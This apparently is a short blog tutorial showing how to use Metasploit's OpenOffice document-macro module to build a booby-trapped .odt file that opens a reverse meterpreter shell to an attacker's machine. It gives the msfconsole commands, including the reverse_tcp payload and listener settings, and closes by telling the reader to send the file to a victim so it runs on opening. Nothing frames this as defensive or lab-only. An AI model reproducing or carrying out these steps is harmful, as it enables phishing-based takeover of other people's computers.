This module generates an
Apache OpenOffice Text Document with a malicious macro in it. To exploit
successfully, the targeted user must adjust the security level in Macro
Security to either Medium or Low. If set to Medium, a prompt is presented to
the user to enable or disable the macro. If set to Low, the macro can
automatically run without any warning. The module also works against
LibreOffice.
Exploit Targets
Apach Open Office on Windows
Requirement
Attacker: kali Linux
Victim PC: Windows 10
Open
the terminal in kali Linux and type msfconsole to load metasploit
framework.
Now
type use exploit/multi/misc/openoffice_document_macro
msf exploit (openoffice_document_macro)>set payload windows/meterpreter/reverse_tcp
msf exploit (openoffice_document_macro)>set lhost 192.168.0.104 (IP
of Local Host)
msf exploit (openoffice_document_macro)>set srvhost 192.168.01.04
msf exploit (openoffice_document_macro)>set lport 4444
msf exploit (openoffice_document_macro)>exploit
From the screenshot
you can see the highlighted text is showing the path of malicious odt file.
The
malicious odt File had been generated successfully which
is stored on your local computer inside following path:
/root/.msf4/local/msf.odt
Now
send your msf.odt files
to victim, as soon as he download and open it, you can access meterpreter shell
on victim computer.
0 comments:
Post a Comment